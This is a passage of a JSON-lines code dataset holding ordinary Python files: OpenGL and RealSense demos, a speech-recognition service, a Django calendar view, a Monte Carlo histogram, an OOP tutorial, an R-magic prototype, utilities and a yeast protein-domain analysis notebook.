box.height)),\n\t\t\t\t\t\t\tcolor, 2)\n\t\t\t\t\t\tprint(output)\n\n\t\t\tcv2.imshow('Realsense depth example', cvRGBImage)\n\t\t\tkey = cv2.waitKey(1)\n\t\t\t# Press esc or 'q' to close the image window\n\t\t\tif key & 0xFF == ord('q') or key == 27:\n\t\t\t\tcv2.destroyAllWindows()\n\t\t\t\tbreak\n\tfinally:\n\t\tpipe.stop()","sub_path":"examples/example_depth.py","file_name":"example_depth.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72320660","text":"\"\"\"\ndemo shows how to handle simple framebuffers.\n\nresults:\n- keeping viewport size constant within framebuffer\n is important to fit texture sizes. \n\n@author Nicolas 'keksnicoh' Heimann \n\"\"\"\nfrom gllib.glfw import * \nfrom OpenGL.GL import * \nimport numpy \nfrom time import time\nif not glfwInit(): \n raise RuntimeError('glfw.Init() error')\n\nglfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 4);\nglfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 1);\nglfwWindowHint(GLFW_OPENGL_FORWARD_COMPAT, GL_TRUE);\nglfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\nwindow1 = glfwCreateWindow(400, 400)\nif not window1: raise RuntimeError('glfw.CreateWindow() error')\n\nvertex_position = numpy.array([\n 0.8, 0.8, 0.8, -0.8, -0.8, -0.8, -0.8, 0.8, 0.8, 0.8\n], dtype=numpy.float32)\nscreen_position = numpy.array([\n -0.95, 0.95, \n -0.95, -0.95, \n 0.95, -0.95, \n 0.95, -0.95, \n 0.95, 0.95,\n -0.95, 0.95, \n], dtype=numpy.float32)\n\ntex_position = numpy.array([\n 0, 1,\n 0, 0,\n 1, 0,\n 1, 0,\n 1, 1,\n 0, 1\n], dtype=numpy.float32)\nVERT_SHADER_ID = \"#version 410\\nin vec2 vertex_position; void main() { gl_Position = vec4(vertex_position, 0, 1); }\"\nFRAG_SHADER_ID = \"#version 410\\nout vec4 output_color; void main() { output_color = vec4(1,0,0,1); }\"\n\nVERT_SHADER_FRAME = \"\"\"\n#version 410\nin vec2 vertex_position;\nin vec2 tex_coords;\nout vec2 frag_tex_coord;\nvoid main() {\n frag_tex_coord = tex_coords;\n gl_Position = vec4(vertex_position, 0, 1); \n}\n\"\"\"\nFRAG_SHADER_FRAME = \"\"\"\n#version 410\nuniform sampler2D tex[1];\nin vec2 frag_tex_coord;\nout vec4 output_color;\nuniform float time;\nvec2 transformed;\nvoid main() {\n output_color = vec4(0.1,1,0,1);\n transformed = vec2(\n exp(-5*sin(time)*(pow(frag_tex_coord[0]-0.5,2)+pow(frag_tex_coord[1]-0.5,2)))*frag_tex_coord[0],\n exp(-5*sin(time)*(pow(frag_tex_coord[0]-0.5,2)+pow(frag_tex_coord[1]-0.5,2)))*frag_tex_coord[1]\n );\n output_color = texture(tex[0], transformed);\n output_color = mix(output_color, vec4(0, transformed ,1), 0.2);\n}\n\"\"\"\n\nglfwMakeContextCurrent(window1)\nprogram1 = glCreateProgram()\nvertex_shader1 = glCreateShader(GL_VERTEX_SHADER)\nglShaderSource(vertex_shader1, VERT_SHADER_ID)\nglCompileShader(vertex_shader1)\nglAttachShader(program1, vertex_shader1)\nfragment_shader1 = glCreateShader(GL_FRAGMENT_SHADER)\nglShaderSource(fragment_shader1, FRAG_SHADER_ID)\nglCompileShader(fragment_shader1)\nglAttachShader(program1, fragment_shader1)\nglLinkProgram(program1)\n\nprogram_frame = glCreateProgram()\nvertex_shader_frame = glCreateShader(GL_VERTEX_SHADER)\nglShaderSource(vertex_shader_frame, VERT_SHADER_FRAME)\nglCompileShader(vertex_shader_frame)\nglAttachShader(program_frame, vertex_shader_frame)\nfrag_shader_frame = glCreateShader(GL_FRAGMENT_SHADER)\nglShaderSource(frag_shader_frame, FRAG_SHADER_FRAME)\nglCompileShader(frag_shader_frame)\nglAttachShader(program_frame, frag_shader_frame)\nglLinkProgram(program_frame)\n\nglfwMakeContextCurrent(window1)\nvert_attr1 = glGetAttribLocation(program1, 'vertex_position')\nvert_attr2 = glGetAttribLocation(program_frame, 'vertex_position')\ntex_coords = glGetAttribLocation(program_frame, 'tex_coords')\n\n# rectangle init\nglfwMakeContextCurrent(window1)\nvao1 = glGenVertexArrays(1)\nvbo1 = glGenBuffers(1)\n\nglBindBuffer(GL_ARRAY_BUFFER, vbo1)\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(vertex_position), vertex_position, GL_STATIC_DRAW)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(vao1)\nglBindBuffer(GL_ARRAY_BUFFER, vbo1)\nglVertexAttribPointer(vert_attr1, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(0)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(0)\n\n# framebuffer screen init\nvao_frame = glGenVertexArrays(1)\nvbo_frame = glGenBuffers(2)\nglBindVertexArray(vao_frame)\nglBindBuffer(GL_ARRAY_BUFFER, vbo_frame[0])\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(screen_position), screen_position, GL_STATIC_DRAW)\nglVertexAttribPointer(vert_attr2, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(0)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\n\nglBindBuffer(GL_ARRAY_BUFFER, vbo_frame[1])\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(tex_position), tex_position, GL_STATIC_DRAW)\nglVertexAttribPointer(tex_coords, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(1)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(0)\n\n# framebuffer init\nrgb_tex_id = glGenTextures(1)\nglBindTexture(GL_TEXTURE_2D, rgb_tex_id);\nglTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, 800, 800, 0, GL_RGBA, GL_UNSIGNED_BYTE, None);\nglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\nglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\nglBindTexture(GL_TEXTURE_2D, 0);\n\nframebuffer_id = glGenFramebuffers(1);\nglBindFramebuffer(GL_DRAW_FRAMEBUFFER, framebuffer_id)\nglDrawBuffer(GL_COLOR_ATTACHMENT0)\nglFramebufferTexture(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, rgb_tex_id, 0);\nrid = glGenRenderbuffers(1)\n\nstart_time = time()\ngl_time = glGetUniformLocation(program_frame, 'time')\n\nwhile not glfwWindowShouldClose(window1):\n timer = time() - start_time\n glfwPollEvents()\n\n # note:\n #\n # viewport changes after glfwPollEvents.\n # to restore viewport after framebuffer, persist\n # current viewport\n old_viewport = glGetIntegerv(GL_VIEWPORT)\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, framebuffer_id)\n\n # note:\n #\n # set viewport size still 800x800 to fit \n # texture sizes\n glViewport(0, 0, 800, 800)\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glUseProgram(program1)\n glBindVertexArray(vao1)\n glDrawArrays(GL_LINE_STRIP, 0, 5)\n glBindVertexArray(0)\n glUseProgram(0)\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, 0)\n\n # note:\n # restore old viewport (before framebuffer frame)\n glViewport(*old_viewport)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glActiveTexture(GL_TEXTURE0);\n glBindTexture (GL_TEXTURE_2D, rgb_tex_id)\n\n glUseProgram(program_frame)\n glUniform1f(gl_time, timer)\n glBindVertexArray(vao_frame)\n glDrawArrays(GL_TRIANGLES, 0, 6)\n glBindVertexArray(0)\n glUseProgram(0)\n glfwSwapBuffers(window1)\n\n","sub_path":"demos/framebuffer.py","file_name":"framebuffer.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116259471","text":"from inference_lib import load_model_and_generator, get_results\nimport json\nfrom model_item import ModelItem\nfrom punctuate.punctuate_text import Punctuation\nfrom inverse_text_normalization.run_predict import inverse_normalize_text\n\nclass ModelService:\n\n def __init__(self, model_config, decoder_type, cuda, half):\n self.model_items = {}\n self.cuda = cuda\n self.half = half\n for language_code, path in model_config.items():\n path_split = path.split(\"/\")\n base_path = \"/\".join(path_split[:-1])\n model_file_name = path_split[-1]\n model_item = ModelItem(base_path, model_file_name, language_code)\n\n model, generator = load_model_and_generator(model_item, self.cuda, decoder = decoder_type, half = self.half)\n\n if language_code == 'en-IN':\n model_item.set_punctuation_model(Punctuation('en'))\n elif language_code == 'hi':\n model_item.set_punctuation_model(Punctuation(language_code))\n\n model_item.set_model(model)\n model_item.set_generator(generator)\n self.model_items[language_code] = model_item\n\n def apply_punctuation_and_itn(self, result, model_item, enable_punctuation, enable_inverse_text_normalization):\n language_code = model_item.get_language_code()\n if enable_punctuation:\n punctuation_response = model_item.get_puncutation_model().punctuate_text([result])\n result = punctuation_response[0]\n \n if enable_inverse_text_normalization:\n language_code = 'en' if language_code == 'en-IN' else language_code\n itn_response = inverse_normalize_text([result],lang=language_code)\n result = itn_response[0]\n \n return result\n\n def get_inference(self, file_name, language_code, enable_punctuation = False, enable_inverse_text_normalization = False):\n model_item = self.model_items[language_code]\n\n result = get_results(\n wav_path = file_name,\n dict_path = model_item.get_dict_file_path(),\n generator = model_item.get_generator(),\n use_cuda = self.cuda,\n model = model_item.get_model(),\n half = self.half\n )\n\n result = self.apply_punctuation_and_itn(result, model_item, enable_punctuation, enable_inverse_text_normalization)\n\n \n return result\n \n \n\nif __name__ == \"__main__\":\n from inference_lib import Wav2VecCtc\n with open('model_config.json','r') as f:\n model_config = json.load(f)\n model_service = ModelService(model_config, 'kenlm', True, True)\n result = model_service.get_inference(\"/home/nireshkumarr/inference-wrapper/files/indian_english/741_3365file-ideleoSHW2Gd0.wav\", 'en-IN')\n print(result)","sub_path":"model_service.py","file_name":"model_service.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290991143","text":"from datetime import datetime, timedelta, date\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views import generic\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nimport calendar\nfrom django.apps import apps\nfrom datetime import datetime, date, timedelta\n\nfrom .models import *\nfrom .utils import *\nfrom .forms import *\n\n\nclass PlanNettoyageView(generic.ListView):\n model = PlanNettoyage\n template_name = 'plan_nettoyage/calendrier_plan_nettoyage.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n d = get_date(self.request.GET.get('month', None))\n cal = Calendar(d.year, d.month)\n html_cal = cal.formatmonth(withyear=True)\n context['calendar'] = mark_safe(html_cal)\n context['prev_month'] = prev_month(d)\n context['next_month'] = next_month(d)\n return context\n\ndef get_date(req_month):\n if req_month:\n year, month = (int(x) for x in req_month.split('-'))\n return date(year, month, day=1)\n return datetime.today()\n\ndef prev_month(d):\n first = d.replace(day=1)\n prev_month = first - timedelta(days=1)\n month = 'month=' + str(prev_month.year) + '-' + str(prev_month.month)\n return month\n\ndef next_month(d):\n days_in_month = calendar.monthrange(d.year, d.month)[1]\n last = d.replace(day=days_in_month)\n next_month = last + timedelta(days=1)\n month = 'month=' + str(next_month.year) + '-' + str(next_month.month)\n return month\n\ndef event(request, event_id=None):\n instance = PlanNettoyage()\n if event_id:\n instance = get_object_or_404(PlanNettoyage, pk=event_id)\n else:\n instance = PlanNettoyage()\n\n form = PlanNettoyageForm(request.POST or None, instance=instance)\n\n if request.POST and form.is_valid():\n\n \ttitle = form.cleaned_data['title']\n \tstart_time = form.cleaned_data['start_time']\n \tend_time = form.cleaned_data['end_time']\n \tfirst_name_collaborateur = form.cleaned_data['first_name_collaborateur']\n \tlast_name_collaborateur = form.cleaned_data['last_name_collaborateur']\n \tpiece = form.cleaned_data['piece']\n \tdescription = form.cleaned_data['description']\n\n \t# Get the id\n \tplan_nettoyage = PlanNettoyage.objects.filter(user_username=request.user.get_username())\n \tid_collaborateur = apps.get_model('collaborateurs', 'Collaborateur').objects.filter(user_username=request.user.get_username(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t first_name = first_name_collaborateur,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t last_name = last_name_collaborateur,)[0].id_collaborateur\n \ttry:\n \t\tid_plan_nettoyage = np.int(np.max([y.id_plan_nettoyage for y in plan_nettoyage]) + 1)\n \texcept Exception:\n \t\tid_plan_nettoyage = 1\n\n \tasset, created = PlanNettoyage.objects.get_or_create(\n\t\t\t\t\t \tdate = datetime.today(),\n\t\t\t\t\t \ttitle=title,\n\t\t\t\t\t \tid_plan_nettoyage = id_plan_nettoyage,\n\t\t\t\t\t \tid_collaborateur = id_collaborateur,\n\t\t\t\t\t \tstart_time = start_time,\n\t\t\t\t\t \tend_time = end_time,\n\t\t\t\t\t \tfirst_name_collaborateur = first_name_collaborateur,\n\t\t\t\t\t \tlast_name_collaborateur = last_name_collaborateur,\n\t\t\t\t\t \tpiece = piece,\n\t \t\t\t\t\t\t\tdescription = description,\n\t \t\t\t\t\t\t\tuser_username = request.user.get_username())\n\n \treturn HttpResponseRedirect(reverse('calendrier_plan_nettoyage'))\n return render(request, 'plan_nettoyage/events.html', {'form': form})\n","sub_path":"apps/plan_nettoyage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571897465","text":"import random\nimport math\nimport pylab\nimport numpy as np\n\nd = 20\nx = [0.0]*d\ndelta = 0.1\nn_trials = 10000000\nold_radius_square = 0.0\nhisto_data = []\n\nfor i in range(n_trials):\n k = random.randint(0, d - 1)\n x_old_k = x[k]\n x_new_k = x_old_k + random.uniform(-delta, delta)\n new_radius_square = old_radius_square + x_new_k ** 2 - x_old_k ** 2\n if new_radius_square < 1.0:\n old_radius_square = new_radius_square\n histo_data.append(math.sqrt(new_radius_square))\n x[k] = x_new_k\n\npylab.hist(histo_data, bins=200, normed=True,label='#r = sqrt(x[0]**2 + x[1]**2 + ... + x[d-1]**2)')\npylab.xlabel('r')\npylab.ylabel('distribution')\ny = lambda x: d*(x**(d-1))\nxp = np.linspace(0,1,1000)\npylab.plot(xp,list(map(y,xp)),label=f\"P(r) = {d}*(x**{d-1})\")\npylab.grid()\npylab.legend(loc='upper left')\npylab.savefig(f'd{d}_r_hist.png')\npylab.show()","sub_path":"B1C.py","file_name":"B1C.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57881864","text":"# 객체 지향 프로그래밍(OOP) -> 코드의 재사용, 코드 중복 방지 등\n# 클래스 상세 설명\n# 클래스 변수, 인스턴스 변수\n\n# 일반적인 코딩\n\n# 학생 1\nstudent_name_1 = 'Kim'\nstudent_number_1 = 1\nstudent_grade_1 = 1\nstudent_detail_1 = [\n {'gender' : 'Male'},\n {'score1' : 95},\n {'score2' : 88}\n]\n\n# 학생 2\nstudent_name_2 = 'Lee'\nstudent_number_2 = 2\nstudent_grade_2 = 2\nstudent_detail_2 = [\n {'gender' : 'Male'},\n {'score1' : 77},\n {'score2' : 92}\n]\n\n# 학생 3\nstudent_name_3 = 'Park'\nstudent_number_3 = 3\nstudent_grade_3 = 4\nstudent_detail_3 = [\n {'gender' : 'Female'},\n {'score1' : 99},\n {'score2' : 100}\n]\n\n# 리스트 구조\nstudent_names_list = ['Kim', 'Lee', 'Park']\nstudent_numbers_list = [1, 2, 3]\nstudent_grades_list = [1, 2, 4]\nstudent_details_list = [\n {'gender': 'Male', 'score1': 95, 'score2': 88},\n {'gender': 'Male', 'score1': 77, 'score2': 92},\n {'gender': 'Female', 'score1': 99, 'score2': 100},\n]\n\n# 학생 삭제\ndel student_names_list[1]\ndel student_numbers_list[1]\ndel student_grades_list[1]\ndel student_details_list[1]\n\nprint(student_names_list)\nprint(student_numbers_list)\nprint(student_grades_list)\nprint(student_details_list)\n\n# 딕셔너리 구조\nstudents_dicts = [\n {'student_name': 'Kim', 'student_number':1, 'student_grade':1, 'student_detail': {'score1': 95, 'score2': 99}},\n {'student_name': 'Lee', 'student_number':2, 'student_grade':2, 'student_detail': {'score1': 77, 'score2': 80}},\n {'student_name': 'Park', 'student_number': 3, 'student_grade': 3,\n 'student_detail': {'score1': 80, 'score2': 100}}\n]\n\ndel students_dicts[1]\nprint(students_dicts)\n\n\n# 클래스 구조\n# 구조 설계 후 재사용성 증ㄹ가, 코드 반복 최소화, 메소드 활용\nclass Student:\n def __init__(self, name, number, grade, details):\n self._name = name\n self._number = number\n self._grade = grade\n self._details = details\n\n def __str__(self):\n return 'str : {} - {}'.format(self._name, self._number)\n\n def __repr__(self):\n return 'repr : {} - {}'.format(self._name, self._number)\n\nstudent1 = Student('Kim', 1, 1, {'gender': 'Male', 'score1': 95, 'score': 100})\nstudent2 = Student('Lee', 2, 2, {'gender': 'Male', 'score1': 80, 'score': 80})\nstudent3 = Student('Park', 3, 3, {'gender': 'Female', 'score1': 50, 'score': 60})\n\nprint(student1.__dict__)\nprint(student2.__dict__)\nprint(student3.__dict__)\n\n# 리스트 선언\nstudents_list = []\nstudents_list.append(student1)\nstudents_list.append(student2)\nstudents_list.append(student3)\n\nprint(students_list)\n\nfor x in students_list:\n print(repr(x))\n print(x) # __str__ 메소드 호출. 없으면 __repr__ 호출\n\n\n\n\n\n\n\n\n\n","sub_path":"algorithm/python_advanced/1.class-advanced-1.py","file_name":"1.class-advanced-1.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496906201","text":"import rpy2.rinterface as ri\nimport numpy as np\nimport rpy2.robjects as ro\nimport sys\nimport tempfile\nfrom glob import glob\nfrom shutil import rmtree\nfrom getopt import getopt\n\n# for publishing the information to the frontends\n\nfrom IPython.core.displaypub import publish_display_data\n\n# enable conversion of numpy arrays into R objects (following to rpy2 documentation)\nfrom rpy2.robjects.numpy2ri import numpy2ri\nro.conversion.py2ri = numpy2ri\n\nclass Rmagic(object):\n\n def __init__(self, shell=None):\n self.r = ro.R()\n self.output = []\n self.eval = ri.baseenv['eval']\n self.shell = shell\n\n def write_console(self, output):\n self.output.append(output)\n\n def flush(self):\n value = ''.join(self.output)\n self.output = []\n return value\n\n def cell_magic(self, args, text):\n # need to get the ipython instance for assigning\n\n opts, args = getopt(args.strip().split(' '), None, ['inputs=',\n 'outputs=',\n # these are options for png\n 'width=',\n 'height=',\n 'units=',\n 'pointsize=',\n 'bg='])\n\n opts = dict(opts)\n outputs = []\n for option, value in opts.items():\n if option == '--inputs':\n # need to have access the shell to assign these\n # python variables to variables in R\n opts.pop('--inputs')\n # with self.shell, we will assign the values to variables in the shell \n # for now, this is a hack, with self.shell a dictionary\n for input in value.split(','):\n self.r.assign(input, self.shell[input])\n if option == '--outputs':\n outputs = value.split(',')\n opts.pop('--outputs')\n \n png_args = ','.join(['%s=%s' % (o[2:],v) for o, v in opts.items()])\n\n # execute the R code in a temporary directory \n\n tmpd = tempfile.mkdtemp()\n self.r('png(\"%s/Rplots%%03d.png\",%s)' % (tmpd, png_args))\n self.eval(ri.parse(text))\n self.r('dev.off()')\n\n # read out all the saved .png files\n\n images = [file(imgfile).read() for imgfile in glob(\"%s/Rplots*png\" % tmpd)]\n \n # now publish the images\n # mimicking IPython/zmq/pylab/backend_inline.py\n fmt = 'png'\n mimetypes = { 'png' : 'image/png', 'svg' : 'image/svg+xml' }\n mime = mimetypes[fmt]\n\n # publish the printed R objects, if any\n publish_display_data('Rmagic.cell_magic', {'text/plain':self.flush()})\n\n # flush text streams before sending figures, helps a little with output \n for image in images:\n # synchronization in the console (though it's a bandaid, not a real sln) \n sys.stdout.flush(); sys.stderr.flush()\n publish_display_data(\n 'Rmagic.cell_magic',\n {mime : image}\n )\n value = {}\n\n # try to turn every output into a numpy array\n # this means that outputs are assumed to be castable\n # as numpy arrays\n\n for output in outputs:\n # with self.shell, we will assign the values to variables in the shell \n self.shell[output] = np.asarray(self.r(output))\n\n # kill the temporary directory\n rmtree(tmpd)\n\n\n\n\n\nrmagic = Rmagic()\nri.set_writeconsole(rmagic.write_console)\n\nif __name__ == '__main__':\n\n snippet = '''\n a=lm(Y~X)\n print(summary(a))\n plot(X, Y, pch=23, bg='orange', cex=2)\n plot(Y, X)\n print(summary(X))\n r = resid(a)\n '''\n\n opts = '--bg=\"gray\" --width=700 --inputs=X,Y --outputs=r'\n\n # for now, this is a placeholder that will eventually be\n # a full ipython shell\n #\n # it is only used to retrieve the value of the variables to \n # be assigned as inputs into R\n rmagic.shell = {'X': np.random.standard_normal(40),\n 'Y': np.random.standard_normal(40)}\n\n result = rmagic.cell_magic(opts, snippet)\n","sub_path":"Rmagic.py","file_name":"Rmagic.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523701637","text":"import importlib\nimport inspect\nimport json\nimport os\nimport platform\nfrom functools import partial\n\nimport sys\n\nHTTP_METHODS = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS']\n\n\ndef jsonify(result, pretty=False, indent=None, separators=None):\n if pretty:\n indent = indent or 4\n separators = separators or (\",\", \": \")\n else:\n separators = separators or (\",\", \":\")\n\n return json.dumps(result, indent=indent, separators=separators)\n\n\ndef import_attr(module, attr: str, cwd='.'):\n if type(attr) is not str:\n raise AttributeError(f\"{attr} is not a string.\")\n if cwd not in sys.path:\n sys.path.insert(0, cwd)\n app_module = importlib.import_module(module)\n if \"PYTEST_CURRENT_TEST\" in os.environ:\n # needed as Chalice local server change class\n app_module = importlib.reload(app_module)\n return getattr(app_module, attr)\n\n\ndef class_auth_methods(obj):\n \"\"\"Returns the auth method from the class if exists.\"\"\"\n methods = inspect.getmembers(obj.__class__, lambda x: inspect.isfunction(x))\n\n for name, func in methods:\n if name == 'auth':\n function_is_static = isinstance(inspect.getattr_static(obj.__class__, func.__name__), staticmethod)\n if function_is_static:\n return func\n return partial(func, obj)\n return None\n\n\ndef class_cws_methods(obj):\n \"\"\"Returns the list of methods from the class.\"\"\"\n methods = inspect.getmembers(obj.__class__, lambda x: inspect.isfunction(x))\n\n return [fun for _, fun in methods if hasattr(fun, '__CWS_METHOD')]\n\n\ndef class_attribute(obj, name: str = None, defaut=None):\n \"\"\"Returns the list of attributes from the class or the attribute if name parameter is defined\n or default value if not found.\"\"\"\n attributes = inspect.getmembers(obj.__class__, lambda x: not inspect.isroutine(x))\n\n if not name:\n return attributes\n\n filtered = [a[1] for a in attributes if a[0] == name]\n return filtered[0] if filtered else defaut\n\n\ndef path_join(*args):\n \"\"\" Joins given arguments into an entry route.\n Trailing but not leading slashes are stripped for each argument.\n \"\"\"\n\n reduced = [x.lstrip('/').rstrip('/') for x in args if x]\n return '/'.join([x for x in reduced if x])\n\n\ndef make_absolute(route):\n return '/' + path_join(route)\n\n\ndef trim_underscores(name):\n while name.startswith('_'):\n name = name[1:]\n while name.endswith('_'):\n name = name[:-1]\n return name\n\n\ndef as_list(var):\n if var is None:\n return []\n if type(var) is list:\n return var\n return [var]\n\n\ndef get_system_info():\n python_info = f\"python {sys.version_info[0]}.{sys.version_info[1]}.{sys.version_info[2]}\"\n platform_system = platform.system().lower()\n platform_release = platform.release()\n platform_info = f\"{platform_system} {platform_release}\"\n return f\"{python_info}, {platform_info}\"\n","sub_path":"coworks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"184517834","text":"\n# coding: utf-8\n\n# In[5]:\n\n\nimport numpy as np\nimport pandas as pd\nimport pybedtools\nimport re\nfrom scipy import stats\n\n\n# In[6]:\n\n\n# Loading the DOMAIN dataset into a dataframe\ndomains = pd.read_csv('domains.csv', names=['seq id', 'alignment start', 'alignment end', 'envelope start',\n 'envelope end', 'hmm acc', 'hmm name', 'type', 'hmm start', 'hmm end',\n 'hmm length', 'bit score', 'E-value', 'clan'])\n\n# Loading table with SEQ ID and corresponding GENE NAMES (ORDERED LOCUS)\ndomain_loci = pd.read_csv('uniprot-filtered-proteome_UP000002311+AND+organism__Saccharomyces+cerevisi--.tab', sep='\\t')\n# Merging the domain dataset with domain_loci to add gene locus names onto the domain dataset; dropping uninformative columns\ndomains = pd.merge(domains, domain_loci, left_on='seq id', right_on='Entry').drop(['Entry', 'type', 'clan', 'envelope start', 'envelope end',\n 'hmm start', 'hmm end', 'hmm length', 'bit score', 'E-value'], axis=1)\nnew_cols = domains.columns.values\nnew_cols[5] = 'Gene locus'\ndomains.columns = new_cols\ndomains.head()\n\n\n# In[7]:\n\n\n# Loading the ANNOTATED GENOME dataset as a dataframe\nannotations = pybedtools.BedTool('saccharomyces_cerevisiae.bed').to_dataframe()\nannotations = annotations.drop(['score', 'thickStart', 'thickEnd', 'itemRgb', 'blockCount', 'blockSizes', 'blockStarts'], axis=1)\nannotations.head()\n\n\n# In[8]:\n\n\n# Merging the domains dataset with the annotations dataset to align domains to their genomic coordinates\ndomains_genomic = pd.merge(domains, annotations, left_on='Gene locus', right_on='name').drop('name', axis=1)\ndomain_start = (domains_genomic['alignment start'] * 3) + domains_genomic['start']\ndomain_end = (domains_genomic['alignment end'] * 3) + domains_genomic['start']\ndomains_genomic['domain start'] = domain_start\ndomains_genomic['domain end'] = domain_end\ndomains_genomic.head()\n\n\n# In[9]:\n\n\n# Making a dataset in BED format of domains and their genomic coordinates, to use for interescting with fragments later\ndomain_bed = pd.DataFrame()\ndomain_bed['chrom'] = domains_genomic['chrom']\ndomain_bed['domStart'] = domains_genomic['domain start']\ndomain_bed['domEnd'] = domains_genomic['domain end']\ndomain_bed = pybedtools.BedTool.from_dataframe(domain_bed)\ndomain_bed.head()\n\n\n# In[10]:\n\n\n# Loading the FRAGMENT dataset as a BedTool\nfragments = pybedtools.BedTool('pacbio-190731-facs-assign.bed')\nfragments.head()\n\n\n# In[11]:\n\n\n# Let x be an adjustable parameter to determine the amount of overlap we require a fragment to have with a domain to consider them as a match\nx = .75\n\n\n# In[12]:\n\n\n# Using the intersect tool to find overlap between fragments and domains, returning the result as a dataframe\nfragment_domains = fragments.intersect(domain_bed, f=x, wo=True, nonamecheck=True).to_dataframe().drop('thickStart', axis=1)\nfragment_domains.columns = ['chrom', 'fragStart', 'fragEnd', 'barcode', 'score', 'strand', 'domStart', 'domEnd', 'overlap']\nfragment_domains.head()\n\n\n# In[13]:\n\n\n# Merging the fragment_domains dataframe with the domains dataset to add more information about the domains\nfragment_domains = pd.merge(fragment_domains, domains_genomic, left_on=['chrom', 'domStart', 'domEnd'], right_on=['chrom', 'domain start', 'domain end'])\nfragment_domains = fragment_domains.drop(['strand_y', 'domain start', 'domain end'], axis=1)\ncols = fragment_domains.columns.values\ncols[5] = 'strand'\ncols[15] = 'geneStart'\ncols[16] = 'geneEnd'\nfragment_domains.columns = cols\nfragment_domains.head()\n\n\n# In[14]:\n\n\n# Save the fragment_domains dataset as a CSV file\nfragment_domains.to_csv('fragment_domains.csv')\n\n\n# In[15]:\n\n\n# A function that takes in rows from the fragment_domain dataset and returns the coordinate for the protein start of the fragment\ndef findProteinStart(row):\n if row['strand'] == '+':\n end = (row['fragEnd'] - row['geneStart'] + 1) // 3\n dist = (row['fragEnd'] - row['fragStart']) // 3\n return end - dist\n elif row['strand'] == '-':\n dist = (row['geneEnd'] - row['fragStart'] + 1) // 3\n tot_dist = (row['geneEnd'] - row['geneStart']) // 3\n return tot_dist - dist\n \n# A function that takes in rows from the fragment_domain dataset after finding the proteinStarts and returns the coordinate for the \n# protein end of the fragment\ndef findProteinEnd(row):\n return row['proteinStart'] + ((row['fragEnd'] - row['fragStart']) // 3)\n\n\n# In[16]:\n\n\n# Applying the functions above to find the protein coordinates of each fragment\nfragment_domains['proteinStart'] = fragment_domains.apply(findProteinStart, axis=1)\nfragment_domains['proteinEnd'] = fragment_domains.apply(findProteinEnd, axis=1)\nfragment_domains = fragment_domains[['chrom','fragStart','fragEnd','proteinStart','proteinEnd','barcode','score','strand','domStart','domEnd','overlap',\n 'seq id','alignment start','alignment end','hmm acc','hmm name','Gene locus','geneStart','geneEnd']]\nfragment_domains.head()\n\n\n# In[17]:\n\n\n# Sorting the fragments BED\nfrags_sorted = fragments.sort()\nfrags_sorted.head()\n\n\n# In[18]:\n\n\n# Picking the most sequenced fragments out of identical fragments\nfrags_sorted = frags_sorted.to_dataframe()\nfrags_sorted.columns = ['chrom','start','stop','barcode','score','strand']\n\nfrags_sorted = frags_sorted.sort_values('score', ascending=False).drop_duplicates(['chrom','start','stop']).sort_index()\nfrags_sorted = pybedtools.BedTool.from_dataframe(frags_sorted)\nfrags_sorted.head()\n\n\n# In[19]:\n\n\n# Intersecting the fragments with themselves to find 90% similar fragments\nfrags_intersected = frags_sorted.intersect(frags_sorted, wao=True, f=.9, r=True, s=True, sorted=True, nonamecheck=True)\nfrags_intersected.head()\n\n\n# In[20]:\n\n\n# Selecting \nfrags_intersected_df = frags_intersected.to_dataframe(names=['chrom A','start 